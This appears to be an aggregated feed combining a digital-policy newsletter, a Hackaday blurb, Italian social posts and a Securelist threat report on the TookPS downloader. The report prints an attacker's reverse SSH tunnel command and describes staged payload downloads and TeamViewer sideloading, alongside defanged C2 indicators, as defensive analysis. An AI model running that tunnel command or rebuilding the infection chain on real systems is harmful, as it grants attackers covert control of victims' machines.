SUPPORTED BY

HELO, GWLEIDYDDIAETH DDIGIDOL YW HYN. For those who don't speak Welsh (like me), that's 'Hello, this is Digital Politics." I'm Mark Scott, and this edition comes to you from an unseasonably warm (well, for the United Kingdom) Welsh coastal village. Normal transmission will resume next week.

— The digital world is increasingly divided between Great Powers. That has left a lot of room for so-called 'middle powers' to exert outsized influence.

— The world of trust and safety is wading through treacherous political waters that will leave many caught between rival national governments.

— Ahead of pending US tariffs to be announced on April 2, it's worth remembering global digital exports have doubled over the last 10 years.

Let's get started.

How to make your mark in digital policymaking

THE UNITED STATES. CHINA. THE EUROPEAN UNION. When it comes to digital, those three make up the trifecta of global powers — for different reasons. The US is home to the world's biggest and most vibrant tech sector — but with few checks for citizens. China's authoritarian control of the internet has fast-tracked new services (and repression) like no other. The EU's world-leading digital regulation offers a third way between outright capitalism and state rule — with a lack of homegrown tech.

Yet in the Digital Great Gate that has engulfed this year, let's take a minute to think about middle powers. Those are the countries like Japan, the UK and Brazil that have sizable domestic markets, exert regional clout due to their size/national expertise and often chart a different path on tech that may be more useful to others caught between the vying interests of China, the US and EU.

It's unrealistic that, say, a Philippines (despite its 100m+ population) is ever going to sit side-by-side next to China to export its own vision of digital across Asia. Ditto goes for Argentina in Latin America. Wouldn't it be better to learn lessons from such middle powers that have created their own way (often with mixed reasons) rather than falling into one of the camps led by the world's three largest digital powers?

If you want to know what that looks like, spend some time in Tokyo. Yes, the world's fourth-largest global economy isn't a slouch when it comes to economic prowess. But its aging population, limited linguistic prowess (sorry to all my Japanese-speaking readers!) and positioning close to China have forced Japan to take some bold swings on digital policymaking that are worth a second look.

**A message from Microsoft** Each day, millions of people use generative AI. Abusive AI-generated content, however, can present risks to vulnerable groups such as women, children, and older adults. In a new white paper, developed in consultation with civil society, we present actionable policy recommendations to promote a safer digital environment.**

The country's recently-announced AI proposals (overview here) are anything but a copy-paste of the EU's AI Act — unlike, ahem, what South Korea tabled. Some may not think Tokyo has gone far enough by only requiring AI companies to cooperate with government AI efforts. But the title of the legislation — "Bill on the Promotion of Research, Development and Utilization of Artificial Intelligence-Related Technologies" — makes clear the proposed rules are more about enabling the emerging technology within the economy, and not about curtailing its use due to concerns AI will undermine society.

The proposals also require Japan to align with "international standards." What those AI standards will be is currently unclear. But it's a hat tip to the wider global (read: Western) policymaking conversation around AI where Japan has continued to punch above its weight. That goes for everything from Tokyo's work around the so-called Hiroshima Process on generative AI to its closed-door leadership via the Organization for Economic Cooperation and Development on global data governance standards (crucial for the ongoing sharing of data internationally).

There are a couple of lessons from Japan's digital policymaking that apply to other countries seeking to make their mark.

First, don't try to do everything at once. Tokyo doesn't want to convince everyone to follow its lead. Instead, it often takes a pragmatic view on a small number of issues where it believes it can make a difference and that will benefit its local businesses/citizens.

Second, a willingness to play host to the bigger powers, which is what Japan did with the Hiroshima Process, can buy you international political capital, on both digital and non-digital issues, that you can tap into further down the line. Recognizing where a country can add value — as a convener, for instance — allows local officials to navigate the inherent difficulties when trying to balance the interests of the Great Digital Powers.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in March:
— Claims that online safety rules are censorship have gone global; Europe's digital rules are not seen to help its citizens; Global data flows are not slowing down. More here.
— A readout on Trump 2.0's approach to digital policy; Why Canada worries about US interference in its election; A debrief on the EU's AI 'gigafactories.' More here.
— Four ways that social media can be made more transparent and accountable via supporting how outsiders access platform data. More here.
— Why we need to come up with a better version of 'tech sovereignty;' Apple's antitrust loss in Brussels is good for (most) Big Tech; AI models' lack of regional diversity. More here.

That's where middle powers can truly come into their own. By outlining a nimble digital policy agenda that centers on a small number of targeted objectives — versus trying to boil the ocean with an overly-complex and broad agenda — countries beyond the EU, China and the US can find niche tech issues that benefit their local constituencies.

That's the positive view. Now for the negative: the UK.

I've already expressed my reservations for London's quixotic approach to digital policy. In short: the only thing that matters, really, is boosting foreign direct investment into the country's region-leading tech sector. And, to be clear, there's nothing wrong with that.

But that hasn't stopped British politicians and policymakers from trying to bite off more than they can chew on everything from online safety to artificial intelligence to digital competition. In recent years, the UK has swung for the fences on all three of those areas, promoting itself as a world-leading center of digital regulation and tech-related industry. You can have the Online Safety Act AND be home to scores of global platform workers. You can pass sophisticated digital antitrust rules AND support the acquisition of local startups by Big Tech giants.

Frankly, I just don't buy it. Unlike Japan, the UK tries to play in the same realm as the US, China and the EU, but doesn't have the economic firepower or the regulatory muscle to do that well. Instead, London finds itself in the worst of all worlds. A middle power (with a lot of strong attributes upon which to call) that is too small to play in the Big Leagues but is unable — or unwilling? — to relegate itself to the second tier where it could really make a difference.

That should be a warning to other countries seeking to find their own path on digital policymaking. Don't pretend you can go head-to-head with global powers when you'll only end up on the worse side of that encounter.

More importantly — and this is especially true for London and its longstanding desire to remain in lockstep with the US — don't change your own digital agenda to fit into the ever-changing policies of longstanding allies.

London's decision, at the last minute, not to sign the communiqué at the recent Paris AI Action Summit because the US had decided not to hurt that country's global reputation with not much upside gained with Washington. The UK's "will they, or won't they" approach to pulling back on exiting digital regulation equally has not positioned the Brits as a safe pair of hands in the ever complex world of global tech policy.

In short, when it comes to navigating a country's own path on digital policy, be more like Japan, and less like the UK.

Chart of the Week

DONALD TRUMP'S ADMINISTRATION WILL UNVEIL a cavalcade of global tariffs on April 2 which some in the White House are calling "Liberation Day."

Thankfully, much of the digital world has escaped these threats as negotiations via the World Trade Organization mostly exempted so-called "electronic transmissions" (read: online purchases) from such duties.

It's a good thing, too. At least for global trade. Over the last decade, trade via so-called "digitally-delivered services" has roughly doubled, based on global exports (see left chart) and imports (see right chart.)

Source: World Trade Organization

Geopolitics is coming for Trust & Safety Inc

LAST WEEK WAS THE SECOND INSTALLMENTof my (London-based) tech policy meet-up series known as "Marked as Urgent." I run it alongside Ben Whitelaw (and his Everything in Moderation newsletter) and Georgia Iacovou (and her Horrific/Terrific newsletter.) Photos here — and let me know if you're down for us bringing the roadshow to your city. We're game.

The topic of the night was: "What next for Trust & Safety?" Disclaimer: I can be a little like a one-trick pony. But I spoke about how the world of (international) politics is almost certainly going to hit the T&S industry like a ton of bricks in the coming months. I'm not sure many in the sector either know or are prepared for what is coming down the pike.

Let's walk through this.

First, there is a growing divide, in the democratic world, between the US and everyone else. No, I'm not talking about Washington's overall shift in policy. Instead, the likes of Australia, Canada and South Korea are quickly moving to impose rules on online platforms to moderate illegal speech — and force companies to explain exactly how they are doing that.

In the US, Trump's position on any form of content moderation — that it is a form of illegal censorship — is well known. It's now getting implemented via Congressional hearings, White House directives and efforts by US federal agencies. That comes despite a growing sophistication in the US-based trust and safety sector that remains arguably the largest, globally, despite the recent shift in political winds.

Second, this split between the US and everyone else on content moderation will force companies to pick sides. Some will do it happily (looking at you, Meta.) Others will shift gears out of either regulatory necessity or political calculation to keep them on the right side of specific world leaders. Yet there will be inherent conflicts when rank-and-file trust and safety experts continue the daily work of complying with national online safety rules, while companies' top executives make public statements about why they believe such work should be stopped.

**A message from Microsoft** New technologies like AI supercharge creativity, business, and more. At the same time, we must take steps to ensure AI is resistant to abuse. Our latest white paper, "Protecting the Public from Abusive AI-Generated Content across the EU," highlights the weaponization of women’s nonconsensual imagery, AI-powered scams and financial fraud targeting older adults, and the proliferation of synthetic child sexual abuse.

The paper outlines steps Microsoft is taking to combat these risks and provides recommendations as to how the EU's existing regulatory framework can be used to combat the abuse of AI-generated content by bad actors. We thank Women Political Leaders, the MenABLE project, the Internet Watch Foundation, the WeProtect Global Alliance, and the European Senior’s Union for their important work and support. Click here to read more.**

I don't envy those inside the platforms who will be stuck between those public statements and the day-to-day requirements of regulatory compliance.

Yet for those outside of the US, don't expect the political world to leave you alone, either.

Now that we are a couple of years into mandatory online safety regimes (well, almost a decade if you're in Australia), there are few lawmakers who are making the case, publicly, about why such rules are good for voters. Sure, national leaders make statements about online kids safety, digital terrorism or (Russian) foreign interference whenever a big news event happens. But there's no elected official really explaining to people why trust and safety is crucial to both creating a more inclusive online environment and (important for any politician) why it's in the country's national interest.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

That's a problem. It's a problem because, at some point, the White House is likely to impose retaliatory tariffs on a country that announces some form of fine and/or remedy on an American social media giant. The Trump 2.0 administration specifically called out the UK and EU online safety regimes for undermining freedom of speech. At this point, we should take Washington at its word about taking such future action.

If/when those tariffs start, which politician in those targeted countries is going to stand up for these regimes? Which leader will be willing to go to the mattresses to defend a national online safety regime so that it doesn't become a bargaining chip in wider trade negotiations with the US?

Currently, I don't see clear support from non-US politicians on those points. It should concern anyone working in the trust and safety industry that there is no mainstream politically buy-in for the work that they do. Especially, as stated above, when there's also growing internal apathy in many of these companies for that work, too.

In the coming months, I'm still unclear how this will play out. Both inside social media giants and within countries' political establishments. But what I do know is that all forms of platform governance will become increasingly intertwined with geopolitics in the months ahead.

Thanks for getting this far. If you're interested in sponsoring future editions of Digital Politics, please get in touch on digitalpolitics@protonmail.com

What I'm reading

— The European Commission announced $1.4 billion in financial support for artificial intelligence, cybersecurity and digital skills across the 27-country bloc. More here.

— The Carnegie Endowment for International Peace goes deep into how decentralized versions of social media platforms represent a new way to govern online spaces. More here.

— The US Office of the Director of National Intelligence published its annual threat assessment, including areas associated with tech. More here.

— Researchers from the University of Münster in Germany delved into how TikTok audio clips were used in disinformation campaigns related to the war in Ukraine. More here.

— British regulators explained why they believed the country's existing rules would foster the development of next-generation AI models. More here.

— The International Association of Privacy Professionals and Harvard's Berkman Klein Center for Internet & Society are organizing a two-day retreat for digital policy leaders in June. They've just opened up registrations here.

digitalpolitics.co/newsletter0…

Getting a look at the internals of a garden variety “wall wart” isn’t the sort of thing that’s likely to excite the average Hackaday reader. You’ve probably cracked one open yourself, and even if you haven’t, you’ve likely got a pretty good idea of what’s inside that sealed up brick of plastic. But sometimes a teardown can be just as much about the journey as it is the end result.

Truth be told, we’re not 100% sure if this teardown from [Brian Dipert] over at EDN was meant as an April Fool’s joke or not. Certainly it was posted on the right day, but the style is close enough to some of his previous work that it’s hard to say. In any event, he’s created a visual feast — never in history has an AC/DC adapter been photographed so completely and tastefully.
An Ode to the Diode
[Brian] even goes so far as to include images of the 2.5 lb sledgehammer and paint scraper that he uses to brutally break open the ultrasonic-welded enclosure. The dichotomy between the thoughtful imagery and the savage way [Brian] breaks the device open only adds to the surreal nature of the piece. Truly, the whole thing seems like it should be part of some avant garde installation in SoHo.

After he’s presented more than 20 images of the exterior of the broken wall wart, [Brian] finally gets to looking at the internals. There’s really not much to look at, there’s a few circuit diagrams and an explanation of the theory behind these unregulated power supplies, and then the write-up comes to a close as abruptly as it started.

So does it raise the simple teardown to an art form? We’re not sure, but we know that we’ll never look at a power adapter in quite the same way again.

hackaday.com/2025/04/02/the-lo…

In early March, we published a study detailing several malicious campaigns that exploited the popular DeepSeek LLM as a lure. Subsequent telemetry analysis indicated that the TookPS downloader, a malware strain detailed in the article, was not limited to mimicking neural networks. We identified fraudulent websites mimic official sources for remote desktop and 3D modeling software, alongside pages offering these applications as free downloads.

Malicious websites

UltraViewer, AutoCAD, and SketchUp are common business tools. Therefore, potential victims of this campaign include both individual users and organizations.

Our telemetry also detected file names such as “Ableton.exe” and “QuickenApp.exe”, alongside malicious websites. Ableton is music production software for composition, recording, mixing, and mastering, and Quicken is a personal finance app for tracking expenses, income, debts, and investments across various accounts.

TookPS

In our report on attacks exploiting DeepSeek as a lure, we outlined the infection chain initiated by Trojan-Downloader.Win32.TookPS. Let us delve into this. Upon infiltrating a victim’s device, the downloader reaches out to its C2 server, whose domain is embedded in its code, to retrieve a PowerShell script. Different malware samples communicate with different domains. For example, the file with the MD5 hash 2AEF18C97265D00358D6A778B9470960 reached out to bsrecov4[.]digital, which was inactive at the time of our research. It received the following base64-encoded command from that domain:

Original command

Decoding reveals the PowerShell command being executed:

The variable “$TookEnc” stores an additional base64-encoded data block, also executed in PowerShell. Decrypting this reveals the following command:

Decoded command from $TookEnc variable shown in the previous screenshot

Example of decrypting another command from $TookEnc variable

Although different samples contain different URLs, the command structure remains identical. These commands sequentially download and execute three PowerShell scripts from the specified URL. The first script downloads “sshd.exe”, its configuration file (“config”), and an RSA key file from the C2 server. The second script retrieves command-line parameters for “sshd” (remote server address, port, and username), and then runs “sshd”.

Example of a malicious PowerShell command generated by the PowerShell script:
ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@$ip_address -i "$user\.ssh\Rc7DexAU73l.41431" -f "$user\.ssh\config"
This command starts an SSH server, thereby establishing a tunnel between the infected device and the remote server. For authentication, it uses the RSA key downloaded earlier, and the server configuration is sourced from the “config” file. Through this tunnel, the attacker gains full system access, allowing for arbitrary command execution.

The third script attempts to download a modified version of the Backdoor.Win32.TeviRat malware onto the victim’s machine, which is a well-known backdoor. The sample we obtained uses DLL sideloading to modify and deploy the TeamViewer remote access software onto infected devices. In simple terms, the attackers place a malicious library in the same folder as TeamViewer, which alters the software’s default behavior and settings, hiding it from the user and providing the attackers with covert remote access. This campaign used the domain invoicingtools[.]com as the C2.

Part of the script that downloads Backdoor.Win32.TeviRat

Additionally, Backdoor.Win32.Lapmon.* is downloaded onto the compromised device. Unfortunately, we were not able to establish the exact delivery method. This backdoor uses the domain twomg[.]xyz as its C2.

In this manner, the attackers gain complete access to the victim’s computer in variety of ways.

Infrastructure

The malicious scripts and programs in this attack primarily used domains registered in early 2024, hosted at two IP addresses:

C2 domains and corresponding IPs

We found no legitimate user-facing resources at these IP addresses. Alongside the campaign-related domains, we also found other domains long blocked by our security solutions. This strongly suggests these attackers had used other tools prior to TookPS, Lapmon, and TeviRat.

Takeaways

The DeepSeek lure attacks were merely a glimpse into a large-scale campaign targeting both home users and organizations. The malware distributed by the attackers was disguised as popular software, including business-critical applications. They attempted to gain covert access to the victim’s device through a variety of methods after the initial infection.

To protect against these attacks, users are advised to remain vigilant and avoid downloading pirated software, which may represent a serious threat.

Organizations should establish robust security policies prohibiting software downloads from dubious sources like pirated websites and torrents. Additionally, regular security awareness training is essential for ensuring a proper level of employee vigilance.

IOCs

MD5
46A5BB3AA97EA93622026D479C2116DE
2DB229A19FF35F646DC6F099E6BEC51F
EB6B3BCB6DF432D39B5162F3310283FB
08E82A51E70CA67BB23CF08CB83D5788
8D1E20B5F2D89F62B4FB7F90BC8E29F6
D26C026FBF428152D5280ED07330A41C
8FFB2A7EFFD764B1D4016C1DF92FC5F5
A3DF564352171C207CA0B2D97CE5BB1A
2AEF18C97265D00358D6A778B9470960
8D0E1307084B4354E86F5F837D55DB87
7CB0CA44516968735E40F4FAC8C615CE
62CCA72B0BAE094E1ACC7464E58339C0
D1D785750E46A40DEF569664186B8B40
EE76D132E179623AD154CD5FB7810B3E
31566F18710E18F72D020DCC2FCCF2BA
F1D068C56F6023FB25A4F4F0CC02E9A1
960DFF82FFB90A00321512CDB962AA5B
9B724BF1014707966949208C4CE067EE

URLs
Nicecolns[.]com
sketchup-i3dmodels-download[.]top
polysoft[.]org
autocad-cracked[.]com
ultraviewer[.]icu
ultraview-ramotepc[.]top
bsrecov4[.]digital
downloader[.]monster
download[.]monster
pstuk[.]xyz
tukeps2ld[.]online
twomg[.]xyz
tuntun2[.]digital
invoicingtools[.]com
tu02n[.]website
inreport2[.]xyz
inrep[.]xyz

IPs
88[.]119.175.187
88[.]119.175.184
88[.]119.175.190

securelist.com/tookps/116019/

A tutto il Fediverso, ripeto, a tutto il Fediverso.

Allarme, ripeto allarme.

May Day, May Day!

Da notti sento qualcosa che si sta sgranocchiando l'armadio nella mia camera da letto, temo siano tarli.

Devo fare un trattamento antitarlo ma non l'ho mai fatto, e in più sono un uomo moderno, di quelli che non sanno fare niente (al contrario degli uomini di una volta, che sapevano fare tutto).

Qualcuno di voi ha esperienza di trattamenti del genere?

Non datemi link a pagine che ne parlano, quelli li trovo da me, cerco gente che l'ha fatto per davvero.

Basta Trump, basta Vance, basta Musk, da oggi vi voglio tutti concentrati sul mio armadio.

Passo.

In un discorso al congresso di qualche giorno fa, #TRUMP, alias #postus ha dichiarato "In qualunuque modo ci tasseranno, noi tasseremo loro!"

Il riferimento è ovviamente ai dazi, e la domanda dunque sorge spontanea: com'è possibile che per moliti americani Biden non si potesse eleggere in quanto ormai "rimbecillito", ma alla fine ci ritroviamo questo qui? Questo vi pare normale?

Certo, Trump dice tutte queste cose con lucidità, probabilmente, tanto da far sorgere un'altra domanda.

Cosa vi ricorda qualcuno che crea un problema e poi vuol far credere di essere le vittima quando gli altri rispondono al problema da lui stesso causato?

Come si chiama questa situazione, che ora non mi sovviene? Ah, sì! Putin.

Fateci caso, la dialettica è esattamente la stessa. Non credo che servano ulteriori dimostrazioni.

#russia
#usa
#putin
#paraculo
#statiuniti
#dazi

Il 18 marzo il parlamento ungherese ha approvato un emendamento alla legge sul diritto di assemblea, che di fatto vieta l'organizzazione pubblica del Pride.

In caso di trasgressione gli eventuali partecipanti potranno essere sanzionati con multe fino a 500 euro. La loro identificazione potrà avvenire tramite registrazione delle immagini e utilizzo di software di riconoscimento facciale.

Nel mio servizio uscito su Valigia Blu, parto da questa storia di straordinario restringimento delle libertà civili per raccontarvi il momento storico che sta vivendo l'Ungheria. Mentre Orbán lancia cupe dichiarazioni, il suo partito si trova per la prima volta in difficoltà nei sondaggi. A un anno dalle elezioni la partita è aperta.

Per capire dove siamo e come siamo arrivati fin qui è utile riavvolgere il nastro degli ultimi 15 anni.

Buona lettura.

valigiablu.it/ungheria-orban-d…

Ungheria: storia di una democrazia sempre più illiberale (e della sua possibile fine) - Valigia Blu

La decisione del governo ungherese di vietare il Pride si inserisce in un contesto di crescente repressione da parte di Orbán. Le elezioni del 2026 saranno una sfida cruciale per il futuro democratico dell’Ungheria.

^{Fabio Turco (Valigia Blu)}